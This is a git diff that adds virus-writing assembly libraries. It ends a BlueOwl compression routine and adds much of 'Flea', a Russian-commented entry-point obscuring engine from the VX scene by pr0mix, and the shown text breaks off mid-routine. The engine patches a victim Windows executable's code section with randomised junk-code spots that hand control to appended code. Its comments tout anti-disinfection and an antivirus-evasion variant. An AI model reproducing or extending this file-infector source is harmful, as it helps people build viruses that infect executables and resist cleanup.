+sort_again:	sub	ecx, ecx        ; ecx = 0
+		mov	esi, esp        ; esi = ptr to first counter
+		lodsd		        ; esi = ptr to next counter
+no_bubble:	inc	ecx
+		cmp	ecx, 4
+		jz	sort_done       ; if no changes were made 4 times bubbling is done
+		lodsd		        ; eax = this counter; esi = next counter
+		cmp     [esi-8], eax    ; compare to previous counter
+		jae	no_bubble       ; if previous counter is bigger or equal make no change
+		xchg    [esi-8], eax    ; swap counters
+		mov     [esi-4], eax
+		mov	al, [esp+23+ecx]; swap nibbles
+		xchg	al, [esp+24+ecx]
+		mov     [esp+23+ecx], al
+		jmp	sort_again      ; start over
+sort_done:	add	esp, 16         ; delete counters (only nibbles remaining)
+
+		pop	ecx	        ; ecx = size of data
+		pop	esi	        ; esi = start of data
+
+		pop	eax	        ; eax = nibble table
+		push	eax
+		shl	eax, 6	        ; move up table
+		stosd		        ; save table
+
+		mov	eax, ecx        ; eax = ecx = size of data (*)
+		stosd		        ; save it                  (*)
+
+		sub	edx, edx        ; edx = 0 (bits stored counter)
+compress_loop:	push	ecx
+		push    4
+		pop	ecx	        ; ecx = 4
+		lodsb
+compress_bits:	sub	ebx, ebx        ; ebx = 0
+		sub	ah, ah	        ; ah = 0
+		shl	eax, 2	        ; ah = xxb
+		inc	ebx	        ; 1 bit large; output is: 0b
+		cmp	ah, [esp+0+4]   ; is it main compress byte?
+		jz	move_bits
+		mov	bh, 10000000b   ; output is: 10b
+		inc	ebx	        ; 2 bit large
+		cmp	ah, [esp+1+4]
+		jz	move_bits
+		mov	bh, 11000000b
+		inc	ebx	        ; 3 bit large; output is: 110b
+		cmp	ah, [esp+2+4]
+		jz	move_bits
+		mov	bh, 11100000b   ; output is: 111b
+move_bits:	shl	dh, 1	        ; get a free bit in dh
+		shl	bh, 1	        ; carry on/of
+		adc	dh, 0	        ; add it to dh
+		inc	edx
+		mov     [edi], dh
+		cmp	dl, 8
+		jnz	no_store_bits
+		inc	edi
+		sub	edx, edx
+no_store_bits:	dec	bl
+		jnz	move_bits
+		loop	compress_bits
+		pop	ecx
+		loop	compress_loop
+
+		mov	cl, 8
+		sub	cl, dl
+		rol	dh, cl	        ; make sure last byte's bits are placed correctly
+		mov     [edi], dh
+		inc	edi
+
+		pop	eax	        ; table not needed anymore
+		ret
+
+; decompress
+;
+; in: esi = pointer to data to be decompressed
+;     edi = pointer to output buffer
+; out: edi = pointer to end of output buffer
+; size: 54 bytes
+
+bnce_decompress:lodsd
+		push	eax	        ; push decoder table
+		lodsd			; (@)
+		xchg	eax, ecx        ; ecx = size when uncompressed (@)
+		mov	dl, 8	        ; indicate new byte needed
+decompress_next:push	ecx
+		push    4	        ; start byte reconstruction (4 nibbles remaining)
+		pop	ecx
+decompress_loop:sub	ebx, ebx        ; type = 0
+		push	ecx
+		push    3	        ; repeat 3 times if necessary
+		pop	ecx
+find_type:	cmp	dl, 8	        ; next byte needed?
+		jnz	dont_fill
+		sub	edx, edx        ; clear bit-counter
+		lodsb		        ; load new byte
+dont_fill:	inc	edx	        ; 1 bit is used from byte
+		shl	al, 1	        ; get the bit
+		jnc	dmove_bits      ; if it is off, type is found
+		inc	ebx	        ; type ++
+		loop	find_type       ; repeat
+dmove_bits:	pop	ecx	        ; restore ecx (stored bit counter)
+		mov	dh, al	        ; save al
+		mov	al, [esp+4+ebx] ; get appropiate bits
+		shl	eax, 2	        ; add bits to ah
+		mov	al, dh	        ; restore al
+		loop	decompress_loop ; if byte is not ready to be put, go on
+		mov     [edi], ah       ; save byte
+		inc	edi	        ; move up ptr
+		pop	ecx
+		loop	decompress_next ; go on decompressing
+		pop	eax
+		ret
+
+; BlueOwl 23 august, 2004
\ No newline at end of file
diff --git a/libs/VirTool.Win32.Cryptor.Flea.asm b/libs/VirTool.Win32.Cryptor.Flea.asm
new file mode 100644
index 00000000..df9693cd
--- /dev/null
+++ b/libs/VirTool.Win32.Cryptor.Flea.asm
@@ -0,0 +1,775 @@
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+;                                                                                                        ; 
+;                                                                                                        ;
+;                        xxxxxxxxxxx   xxxx          xxxxxxxxxxx     xxxxxxxxxx                          ; 
+;                        xxxxxxxxxxx   xxxx          xxxxxxxxxxx    xxxx   xxxx                          ;
+;                        xxxx          xxxx          xxxx          xxxx    xxxx                          ;
+;                        xxxx          xxxx          xxxx          xxxx    xxxx                          ;
+;                        xxxxxxxxx     xxxx          xxxxxxxxx     xxxx    xxxx                          ;
+;                        xxxxxxxxx     xxxx          xxxxxxxxx     xxxx xx xxxx                          ;
+;                        xxxx          xxxx          xxxx          xxxx xx xxxx                          ;
+;                        xxxx          xxxx   xxxx   xxxx          xxxx    xxxx                          ;
+;                        xxxx          xxxxxxxxxxx   xxxxxxxxxxx   xxxx    xxxx                          ;
+;                        xxxx          xxxxxxxxxxx   xxxxxxxxxxx   xxxx    xxxx                          ;
+;                                                                                                        ; 
+;                                                                                                        ;   
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+;                                         UEP ENGINE                                                     ;
+;                                            FLEA                                                        ; 
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; 
+;                                                                                                        ;
+;                                           :)!                                                          ;
+;                                                                                                        ; 
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+;                                                                                                        ;
+;                                       функция FLEA                                                     ;
+;                                      уеп(уёб) движок                                                   ; 
+;                                                                                                        ;
+;                                                                                                        ;
+;ВХОД:                                                                                                   ; 
+;1 параметр (и единственный) - адрес структуры (UEPGEN) (ее описание смотри ниже)                        ;
+;--------------------------------------------------------------------------------------------------------;
+;ВЫХОД:                                                                                                  ;
+;EAX - абсолютный виртуальный адрес точки входа                                                          ;
+;(а также самое главное: запись пятен в кодовую секцию с последующим сохранением оригинальных байт       ; 
+;--------------------------------------------------------------------------------------------------------;
+;ЗАМЕТКИ:                                                                                                ;
+;структура, указатель на которую передан в качестве параметра, не портится, т.е. данные в ней после      ;
+;вызова данного движка остаются теми же.                                                                 ; 
+;                                                                                                        ;
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;  
+;                                                                                                        ;
+;                                           !                                                            ;
+;                                                                                                        ;
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; 
+;                                                                                                        ;
+;                                   ОПИСАНИЕ СТРУКТУРЫ                                                   ;
+;                                        UEPGEN                                                          ;  
+;                                                                                                        ;
+;                                                                                                        ;
+;UEPGEN struct                                                                                           ; 
+;   rgen_addr           dd  ?   ;адрес Генератора Случайных Чисел (ГСЧ)                                  ;
+;   tgen_addr           dd  ?   ;адрес Генератора Мусорных Инструкций                                    ;  
+;   mapped_addr         dd  ?   ;база мэппинга файла (MapViewOfFile)                                     ; 
+;   xsection            dd  ?   ;IMAGE_SECTION_HEADER секции, в которую после после передать управление  ; 
+;   reserved1           dd  ?   ;зарезервировано                                                         ;  
+;MORPHGEN   ends                                                                                         ;
+;                                                                                                        ; 
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+;                                                                                                        ;
+;                                   ОПИСАНИЕ СТРУКТУРЫ                                                   ;
+;                                         T2GEN                                                          ; 
+;                                    (aka TRASHGEN)                                                      ; 
+;                       (более детальное описание смотри в движке xTG)                                   ; 
+;                                                                                                        ;
+;                                                                                                        ;
+;TRASHGEN   struct                                                                                       ;
+;   rgen_addr       dd      ?   ;адрес Генератора Случайных Чисел (ГСЧ)                                  ;
+;   buf_for_trash   dd      ?   ;адрес (буфер), куда записывать генерируемое (хех, качественное) дерьмо  ;
+;   size_trash      dd      ?   ;размер (в байтах), сколько мусора записать                              ;
+;   regs            dd      ?   ;занятые регистры (2 шт)                                                 ;
+;   xmask1          dd      ?   ;64-битная маска для генерации                                           ;
+;   xmask2          dd      ?   ;мусорных команд (ака фильтр)                                            ;
+;   beg_addr        dd      ?   ;начальный адрес                                                         ;
+;   end_addr        dd      ?   ;конечный адрес                                                          ;
+;   mapped_addr     dd      ?   ;зарезервировано (либо база мэпинга (ака адрес файла в памяти))          ;      
+;   reserv1         dd      ?   ;зарезервировано (хз, может когда-то там что и будет)                    ; 
+;TRASHGEN   ends                                                                                         ;
+;                                                                                                        ; 
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+;                                                                                                        ;
+;                                           !                                                            ;
+;                                                                                                        ; 
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; 
+;                                                                                                        ;
+;                           ПОЯСНЕНИЕ К ПОЛЯМ СТРУКТУРЫ UEPGEN:                                          ;  
+;                                                                                                        ;
+;                                                                                                        ;
+;[   rgen_addr   ] :                                                                                     ; 
+;                    так как данный движок (FLEA) разработан без привязки к какому-либо другому мотору,  ;
+;                    а для генерации мусора (и некоторых других фич) важен ГСЧ, поэтому адрес ГСЧ        ; 
+;                    хранится в (данном) поле структуры.                                                 ;
+;                    ВАЖНО: если мотор FLEA будет использовать другой ГСЧ (а не тот, который             ;
+;                    идет с ним в комплекте), надо, чтобы этот другой ГСЧ принимал в качестве 1-го       ;
+;                    (и единственного!) параметра в стэке число (назовем его N), так как поиск будет в   ;
+;                    диапазоне [0..n-1]. И на выходе другой ГСЧ должен возвращать в EAX случайное число. ;  
+;                    Остальные регистры должны остаться неизменными. Все.                                ; 
+;--------------------------------------------------------------------------------------------------------; 
+;[   tgen_addr   ] :                                                                                     ;
+;                    аналогично, как и с предыдущим полем структуры. Только тогда генератор мусора       ;
+;                    должен быть приведен к виду, как xTG (в ненужных полях можно передавать нули и все  ;
+;                    тип-топ).                                                                           ;
+;--------------------------------------------------------------------------------------------------------;
+;[  mapped_addr  ] :                                                                                     ; 
+;                    в этом поле хранится база мэппинга файла. Как пример, значение получаемое после     ; 
+;                    вызова функи MapViewOfFile.                                                         ; 
+;--------------------------------------------------------------------------------------------------------; 
+;[   xsection    ] :                                                                                     ;   
+;                    здесь передавать либо 0, либо IMAGE_SECTION_HEADER (в жертве) той секции, в         ; 
+;                    которую после отработки должен будет передать управление данный uep-движок.         ; 
+;                    Если здесь 0, то управление будет передано в конец последней секции.                ;  
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;                         
+;                                                                                                        ;
+;                                          ЗАМЕТКИ                                                       ;
+;                                                                                                        ;
+;                                                                                                        ;
+;1) для сокрытия точки входа (то есть для генерации пятен) следует вызвать (главную) функцию FLEA.       ;
+;2) для восстановления ранее сохраненных байт следует вызвать FLEA_RESTBYTES (возможно потребуется       ;
+;   нужному участку памяти задать атрибуты страниц на чтение+запись).                                    ;
+;3) так как пятна представляют собой подфункции (с прологом, эпилогом, командой ret), и переход к        ;
+;   следующему пятну осуществляется с помощью CALL'ов, то в стэке лежат разные значения. И чтобы после   ;
+;   стэк сбалансировать, следует вызвать FLEA_RESTSTACK. ВАЖНО: перед вызовом функции FLEA_RESTSTACK,    ;
+;   в стэке не должно быть уже никаких других данных.                                                    ;
+;                                                                                                        ; 
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; 
+;                                                                                                        ;
+;                                           y0p!                                                         ;
+;                                                                                                        ;  
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+;                                                                                                        ;
+;                                           ФИЧИ                                                         ;
+;                                                                                                        ;
+;                                                                                                        ;
+;(+) генерация рандомного числа пятен                                                                    ; 
+;                                                                                                        ;
+;(+) пятна имеют рандомный размер, а также разный переход по пятнам (сверху вниз и наоборот)             ;
+;                                                                                                        ;
+;(+) техника неизлечимости                                                                               ; 
+;                                                                                                        ;
+;(+) использование ГСЧ и Генератора Мусора (особенно своих, так это вообще охуительно)                   ; 
+;                                                                                                        ;
+;(+) базонезависимость                                                                                   ;
+;                                                                                                        ; 
+;(+) пятна выглядят как подфункции (с прологом, эпилогом, командой ret, а также возможно и fake winapi)  ;
+;                                                                                                        ;  
+;(+) нет привязки к другим движкам (ГСЧ & trashgen можно юзать любой - условия читай выше;)              ; 
+;       * можно компилить как самостоятельный модуль;                                                    ;            
+;                                                                                                        ;
+;(+) не юзает WinAPI                                                                                     ;
+;                                                                                                        ;
+;(+) управление можно передавать на любую секцию после отработки uep-движка (также опционально)          ; 
+;                                                                                                        ; 
+;(x) использует данные и дельта-смещение.                                                                ;  
+;                                                                                                        ;              
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+;                                                                                                        ;
+;                                           y0p!                                                         ;
+;                                                                                                        ; 
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+;                                                                                                        ;
+;                                       ИСПОЛЬЗОВАНИЕ:                                                   ;
+;                                                                                                        ;
+;                                                                                                        ;
+;1) Подключение:                                                                                         ;
+;       FLEA.asm                                                                                         ; 
+;2) Вызов (пример stdcall):                                                                              ;
+;       ...                                                                                              ;
+;       szBuf       db 100      dup (00h)                                                                ; 
+;       ...                                                                                              ;
+;       lea     ecx,szBuf                                                                                ;
+;       assume  ecx:ptr UEPGEN                                                                           ;      
+;       mov     [ecx].rgen_addr,00401000h       ;по этому адресу должен находиться ГСЧ                   ;
+;       mov     [ecx].tgen_addr,00401300h       ;по этому адресу должен находиться трэшген               ; 
+;       mov     [ecx].mapped_addr,00330000h     ;по этому адресу находится база мэппинга                 ;  
+;       mov     [ecx].xsection,0                ;ставим в ноль, значит уеп после передаст управление     ; 
+;                                               ;на конец последней секции                               ;  
+;                                               ;остальные параметры обнулены.                           ;
+;       call    FLEA                            ;вызываем полиморфный движок                             ;  
+;                                                                                                        ; 
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; 
+;v1.0 
+;коменты обычно пишутся ночью, поэтому возможен бредняк в них. 
+ 
+
+
+                                                        ;m1x
+                                                    ;pr0mix@mail.ru
+                                                ;EOF 
+                                                                                                  
+                                                                                                    
+
+
+
+
+
+;========================================================================================================
+;структуры
+;========================================================================================================
+UEPGEN  struct
+    rgen_addr       dd      ?
+    tgen_addr       dd      ? 
+    mapped_addr     dd      ?
+    xsection        dd      ? 
+    reserved1       dd      ? 
+UEPGEN  ends 
+;--------------------------------------------------------------------------------------------------------  
+T2GEN   struct                                                                                           ;
+    rgen_addr       dd      ?   ;адрес Генератора Случайных Чисел (ГСЧ)                                  ;
+    buf_for_trash   dd      ?   ;адрес (буфер), куда записывать генерируемое (хех, качественное) дерьмо  ;
+    size_trash      dd      ?   ;размер (в байтах), сколько мусора записать                              ;
+    regs            dd      ?   ;занятые регистры (2 шт)                                                 ;
+    xmask1          dd      ?   ;64-битная маска для генерации                                           ;
+    xmask2          dd      ?   ;мусорных команд (ака фильтр)                                            ;
+    beg_addr        dd      ?   ;начальный адрес                                                         ;
+    end_addr        dd      ?   ;конечный адрес                                                          ;
+    mapped_addr     dd      ?   ;база мэпинга                                                            ; 
+    reserv1         dd      ?   ;зарезервировано (хз, может когда-то там что и будет)                    ; 
+T2GEN   ends                                                                                             ;
+;========================================================================================================
+
+
+
+
+MAX_SPOTS           equ     10                  ;максимальное кол-во генерируемых пятен             
+uportion1           equ     85                  ;размер (в байтах) 1-ой порции мусора 
+uportion2           equ     50                  ;размер (в байтах) 2-ой порции мусора
+MIN_FIRST_PORTION   equ     uportion1-30        ;генерировать первую порцию мусора не меньше данного кол-ва байт    
+min_jmp             equ     uportion1+uportion2+7+10+30 ;расстояние минимальное  
+max_jmp             equ     min_jmp+200         ;расстояние максимальное 
+
+                                                ;далее идут значения для трэшгена
+begin_address       equ     0                   ;начальный адрес (описание смотри в xTG.asm, либо ставь нули) 
+end_address         equ     0                   ;конечный адрес
+mask_trash1         equ     00000000000011111111110101111001b ;маска для мусора 
+mask_trash2         equ     011110000b          ;2-ая часть маски (разрешаем только генерацию фэйковых апишек)  
+
+
+ 
+
+
+FLEA:                                           ;движок FLEA   
+    pushad                                      ;сохраняем регистры 
+    cld 
+    mov     ebp,esp                             ;[ebp+00] 
+    mov     ebx,dword ptr [ebp+24h] 
+    assume  ebx:ptr UEPGEN                      ;ebx - указатель на структуру UEPGEN
+    mov     esi,[ebx].mapped_addr      
+    assume  esi:ptr IMAGE_DOS_HEADER
+    add     esi,[esi].e_lfanew
+    push    esi                                 ;[ebp-04] ;сохраняем указатель на IMAGE_NT_HEADERS 
+    lodsd
+    assume  esi:ptr IMAGE_FILE_HEADER
+    movzx   ecx,[esi].NumberOfSections
+    movzx   edx,[esi].SizeOfOptionalHeader
+    add     esi,sizeof IMAGE_FILE_HEADER 
+    assume  esi:ptr IMAGE_OPTIONAL_HEADER 
+    push    [esi].AddressOfEntryPoint           ;[ebp-08] ;сохраняем точку входа 
+    push    [esi].ImageBase                     ;[ebp-12] ;сохраняем базу 
+    add     esi,edx 
+    assume  esi:ptr IMAGE_SECTION_HEADER
+    sub     esp,(sizeof T2GEN + 4 + 80)         ;выделяем в стэке место для временных переменных и структуры T2GEN (aka TRASHGEN) 
+    mov     tgen_struct,esp
+    mov     edx,esp
+    assume  edx:ptr T2GEN
+;-------------------------------------------------------------------------------------------------------- 
+    push    mask_trash1                         ;пофильтруем маску для генерации трэша  
+    call    gen_mask
+    or      al,1 
+    mov     xtmask1,eax   
+    push    mask_trash2
+    call    gen_mask 
+    or      eax,01110000b          
+    mov     xtmask2,eax 
+;--------------------------------------------------------------------------------------------------------    
+    push    [ebx].rgen_addr                     ;вначале заполним некоторые поля структуры TRASHGEN 
+    pop     [edx].rgen_addr
+    mov     [edx].regs,0FFh
+    push    xtmask1
+    pop     [edx].xmask1
+    push    xtmask2 
+    pop     [edx].xmask2
+    mov     [edx].beg_addr,begin_address
+    mov     [edx].end_addr,end_address
+    push    [ebx].mapped_addr
+    pop     [edx].mapped_addr   
+    xor     eax,eax 
+    cdq                       
+;--------------------------------------------------------------------------------------------------------
+_search_new_ep_:                                ;далее начинаем поиск кодовой секции 
+    cmp     edx,[esi].VirtualAddress
+    ja      _search_code_sec_
+    cmp     eax,[esi].PointerToRawData 
+    ja      _search_code_sec_    
+    mov     edx,[esi].VirtualAddress            ;а также сохраним новую точку входа (она будет указывать на конец последней секции)      
+    mov     eax,[esi].PointerToRawData
+    mov     edi,[esi].SizeOfRawData
+    mov     new_ep,edx
+    add     new_ep,edi 
+;--------------------------------------------------------------------------------------------------------
+_search_code_sec_:
+    push    eax 
+    mov     eax,old_ep
+    mov     edi,[esi].VirtualAddress 
+    cmp     edi,eax;old_ep
+    ja      _nextsection_
+    cmp     [esi].Misc.VirtualSize,0
+    jne     _vsok_
+    add     edi,[esi].SizeOfRawData   
+    jmp     _psok_
+_vsok_:
+    add     edi,[esi].Misc.VirtualSize
+_psok_:  
+    cmp     edi,eax  
+    jbe     _nextsection_  
+    sub     eax,[esi].VirtualAddress
+    add     eax,[esi].PointerToRawData 
+    add     eax,[ebx].mapped_addr   
+    mov     start_addr,eax                      ;если нашли кодовую секцию, то сохраним физический адрес точки входа, т.к. отсюда и начнем клепать пятна    
+    mov     codesec,esi                         ;а также сохраним аказатель в табличке секций на кодовую секцию  
+_nextsection_: 
+    pop     eax
+    add     esi,sizeof IMAGE_SECTION_HEADER
+    loop    _search_new_ep_ 
+;--------------------------------------------------------------------------------------------------------
+    mov     esi,codesec                         ;после вычислим конец кодовой секции 
+    mov     eax,[esi].SizeOfRawData 
+    cmp     eax,[esi].Misc.VirtualSize
+    jbe     _sizecsok_
+    cmp     [esi].Misc.VirtualSize,0 
+    je      _sizecsok_ 
+    mov     eax,[esi].Misc.VirtualSize
+     
+_sizecsok_:
+    add     eax,[esi].VirtualAddress        
+    sub     eax,old_ep
+    mov     size_codesec,eax
+    add     eax,old_ep
+    mov     max_codesec_addr,eax  
+    mov     edi,imNTh
+    assume  edi:ptr IMAGE_NT_HEADERS
+;--------------------------------------------------------------------------------------------------------    
+_maxvacs_:                                      ;далее, найдем максимальный адрес, и получится отрезок:
+                                                ;[физич. адрес точки входа ; максимальный адрес в кодовой секции] 
+                                                ;и в этом отрезке будем записывать пятна. Иначе в кодовой секции могут быть директории импорта, tls и т.д.
+                                                ;И если мы перепишем их своими пятнами, то будет пыцдэт файлу 
+    mov     eax,[edi].OptionalHeader.DataDirectory[ecx*8].VirtualAddress    
+    cmp     old_ep,eax
+    ja      _nextdatadir_  
+    cmp     max_codesec_addr,eax 
+    jb      _nextdatadir_ 
+    mov     max_codesec_addr,eax  
+_nextdatadir_:    
+    inc     ecx
+    cmp     ecx,15
+    jne     _maxvacs_
+;--------------------------------------------------------------------------------------------------------
+    mov     eax,max_codesec_addr      
+    sub     eax,[esi].VirtualAddress
+    add     eax,[esi].PointerToRawData
+    add     eax,[ebx].mapped_addr  
+    mov     max_codesec_addr,eax                ;получаем максимальный физический адрес в кодовой секции  
+                                                ;Так, теперь диапазон у нас есть 
+    mov     eax,start_addr
+    mov     cur_codesec_addr,eax
+
+    push    MAX_SPOTS
+    call    [ebx].rgen_addr                     ;рэндомно получаем, сколько пятен сгенерим и запишем в кодовую секцию  
+    inc     eax  
+    mov     num_spots,eax
+       
+    call    _delta_uep_
+_delta_uep_:
+    pop     eax
+    sub     eax,_delta_uep_
+    lea     ecx,[restore_bytes+eax]
+    mov     beg_rest_bytes,ecx                  ;в этот буфер будем сохранять оригинальные байты из кодовой секции (которые перепишем пятнами) 
+     
+    xor     ecx,ecx     
+;-------------------------------------------------------------------------------------------------------- 
+_nextaddrforspots_:       
+    call    get_jmpaddr                         ;получим адрес очередного пятна, на которое прыгнем  
+    add     eax,cur_codesec_addr
+    push    eax                                   
+    add     eax,(uportion1+uportion2+7+10)      ;прибавим 2 порции мусора + max размер (mov reg,<address>   call reg) (7 byte) + размер пролога и эпилога для каждого пятнышка (6 byte  + 3 byte) + размер команды ret (+1 byte)              
+    cmp     eax,max_codesec_addr                ;и сравним с максимальный допустимым адресом  
+    pop     eax 
+    jae     _alladdrforspots_                   ;если больше макс. адреса, то пятна больше не варик генерить, и выходим из цикла 
+    push    eax                                 ;иначе сохраняем в стэке адрес   
+    mov     cur_codesec_addr,eax                ;сделаем текущим адресом проверки адрес для нового пятна  
+    inc     ecx
+    cmp     ecx,num_spots
+    jne     _nextaddrforspots_
+_alladdrforspots_:
+    mov     num_spots,ecx                       ;сохраним кол-во пятен, которые точно можно записать в кодовой секции 
+;--------------------------------------------------------------------------------------------------------
+    cmp     cl,1  
+    push    0
+    pop     eax
+    jb      _enduep_                            ;если ноль пятен, то выходим из движка      
+    mov     eax,esp  
+    push    start_addr                          ;будем перемешивать все полученные адреса пятен, кроме первого  
+    je      _nomixaddr_       
+;--------------------------------------------------------------------------------------------------------        
+    push    ecx
+    push    eax
+    call    mix_addr                            ;перемешаем адреса пятен 
+
+_nomixaddr_:    
+    xor     edx,edx
+    mov     edi,beg_rest_bytes
+    stosb                                       ;в 1-ом байте будет храниться кол-во пятен. Пока пропустим его 
+    mov     cur_rest_bytes,edi 
+;-------------------------------------------------------------------------------------------------------- 
+_genspot_:
+    mov     edi,cur_rest_bytes  
+_portion1_: 
+    push    uportion1 
+    call    [ebx].rgen_addr
+    cmp     eax,MIN_FIRST_PORTION
+    jb      _portion1_                       
+    mov     spot1,eax
+    xchg    eax,ecx
+    push    uportion2
+    call    [ebx].rgen_addr
+    mov     spot2,eax
+    add     ecx,eax 
+    add     ecx,(7+10)                          ;max_size (mov reg,<address>   call reg) (7 byte) + prologue (6 byte) + epilogue (3 byte) + ret (1 byte)    
+    mov     eax,ecx
+    stosd                                       ;сначала сохраним в спец. буфере размер очередного пятна (это 1-ая порция мусора + jmp + 2-ая порция мусора)  
+    mov     eax,dword ptr [esp]
+    mov     esi,codesec
+    sub     eax,[ebx].mapped_addr 
+    sub     eax,[esi].PointerToRawData
+    add     eax,[esi].VirtualAddress
+    add     eax,base
+    stosd                                       ;и сохраним следом абослютный виртуальный адрес, куда после будем восстанавливать ранее сохраненные байты        
+    mov     esi,dword ptr [esp] 
+    rep     movsb                               ;а после сохраним байты, на место которых запишем пятно 
+    mov     cur_rest_bytes,edi
+    pop     edi 
+    push    edx
+    mov     edx,tgen_struct   
+;--------------------------------------------------------------------------------------------------------    
+    mov     [edx].buf_for_trash,edi 
+    mov     [edx].size_trash,6                  ;размер пролога   
+    mov     [edx].xmask1,0b
+    mov     [edx].xmask2,100b                   ;в маске разрешаем генерацию только пролога (для другого генератора мусора здесь возможна генерация порции мусора)   
+    push    edx
+    call    [ebx].tgen_addr                     ;запишем пролог (push ebp   mov ebp,esp   sub esp,0xXX)           
+    push    xtmask1
+    pop     [edx].xmask1
+    push    xtmask2
+    pop     [edx].xmask2  
+;--------------------------------------------------------------------------------------------------------    
+    mov     [edx].buf_for_trash,eax 
+    mov     eax,spot1 
+    mov     [edx].size_trash,eax
+    push    edx
+    call    [ebx].tgen_addr                     ;запишем первую порцию мусора       
+    xchg    eax,edi
+    push    edi
+    add     edi,5
+    mov     eax,dword ptr [esp+04]
+    cmp     eax,num_spots                       ;проверим, остался последний адрес для записи пятна?
+    jne     _nextspot_                          ;если да, тогда запишем финальное пятно, jmp в котором будет указывать на последнюю секцию, а не на очередное пятно 
+;******************************************************************************************************** 
+comment %       
+                                                ;запись финального пятна 
+    mov     esi,codesec                         ;с помощью нехитрой формулы посчитаем операнд для jmp (0xE9)                            
+    sub     edi,[ebx].mapped_addr
+    sub     edi,[esi].PointerToRawData
+    add     edi,[esi].VirtualAddress
+    mov     ecx,[ebx].xsection
+    jecxz   _notxsec_
+    assume  ecx:ptr IMAGE_SECTION_HEADER 
+    sub     edi,[ecx].VirtualAddress
+    sub     edi,[ecx].SizeOfRawData             ;здесь строим call near (0xE8 0xXX 0xXX 0xXX 0xXX)   
+    jmp     _finalcall_
+_notxsec_: 
+    sub     edi,new_ep
+_finalcall_:
+    neg     edi
+    xchg    edi,dword ptr [esp]
+    mov     al,0E8h ;0E9h                       ;CALL NEAR 0xXXXXXXXX (0xE8 0xXX 0xXX 0xXX 0xXX)   
+    stosb
+    pop     eax
+    stosd 
+        ;%
+                          
+;comment !                                      ;for mcafe
+    mov     edi,new_ep 
+    mov     ecx,[ebx].xsection
+    jecxz   _notxsec_                           ;если поле пустое, значит управление после уепа передаем в конец последней секции  
+    assume  ecx:ptr IMAGE_SECTION_HEADER
+    mov     edi,[ecx].VirtualAddress
+    add     edi,[ecx].SizeOfRawData    
+_notxsec_:
+    add     edi,base                            ;а здесь строим   
+    xchg    edi,dword ptr [esp]
+    mov     al,0B8h                             ;mov    reg32,<address>
+    stosb
+    pop     eax
+    stosd
+    mov     al,0FFh                             ;call   reg32 
+    stosb
+    mov     al,0D0h
+    stosb 
+        ;!   
+    mov     [edx].buf_for_trash,edi
+    mov     eax,spot2
+    mov     [edx].size_trash,eax
+    push    edx
+    call    [ebx].tgen_addr                     ;2-ая порция мусора для финального пятна 
+;--------------------------------------------------------------------------------------------------------
+    mov     [edx].buf_for_trash,eax  
+    mov     [edx].size_trash,3                  ;размер эпилога  
+    mov     [edx].xmask1,0b
+    mov     [edx].xmask2,1000b                  ;в маске разрешаем генерацию только эпилога (для другого генератора мусора здесь возможна генерация очередной порции мусора)     
+    push    edx
+    call    [ebx].tgen_addr                     ;запишем эпилог для финального пятна (mov esp,ebp   pop ebp)           
+    mov     byte ptr [eax],0C3h                 ;и запишем ret    
+;-------------------------------------------------------------------------------------------------------- 
+    pop     edx  
+    jmp     _endspot_                           ;выходим из цикла  
+;********************************************************************************************************  
+                                                ;запись очередного пятна 
+_nextspot_: 
+    sub     edi,dword ptr [esp+08]              ;следующий адрес
+    neg     edi
+    xchg    edi,dword ptr [esp]
+    mov     al,0E8h                             ;CALL NEAR (0xE8 0xXX 0xXX 0xXX 0xXX)   
+    stosb
+    pop     eax
+    stosd 
